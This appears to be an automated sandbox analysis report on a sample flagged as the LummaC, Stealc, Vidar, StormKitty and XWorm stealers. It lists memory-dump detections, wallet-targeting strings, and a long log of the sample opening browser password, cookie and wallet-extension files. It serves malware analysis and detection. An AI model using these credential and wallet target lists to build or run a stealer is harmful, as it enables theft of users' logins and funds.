Source: Yara match	File source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2341998283.0000000000C21000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2330918889.0000000000C21000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2246624834.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2301401913.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4565122360.0000000000C21000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2519256934.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2287568348.0000000000591000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: SQ1NgqeTQy.exe PID: 4088, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000003.00000003.2205394857.0000000005640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2262935516.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2258579469.0000000000E61000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe PID: 5008, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected StormKitty Stealer

Source: Yara match	File source: 0000001D.00000002.4578058970.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1788, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected XWorm

Source: Yara match	File source: 29.2.regsvr32.exe.8a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.20e131e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.66ca5e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4578058970.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4575261917.00000000020E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4569892251.000000000064B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1788, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: SQ1NgqeTQy.exe, 00000000.00000003.2124440616.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"
Source: SQ1NgqeTQy.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: SQ1NgqeTQy.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: SQ1NgqeTQy.exe, 00000000.00000003.2104038300.0000000000F93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: SQ1NgqeTQy.exe, 00000000.00000003.2124440616.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: }],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","hv
Source: SQ1NgqeTQy.exe, 00000000.00000003.2124440616.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: obppdil","ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"}
Source: SQ1NgqeTQy.exe, 00000000.00000003.2124440616.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: }],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","hv
Source: SQ1NgqeTQy.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: SQ1NgqeTQy.exe, 00000000.00000003.2124440616.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
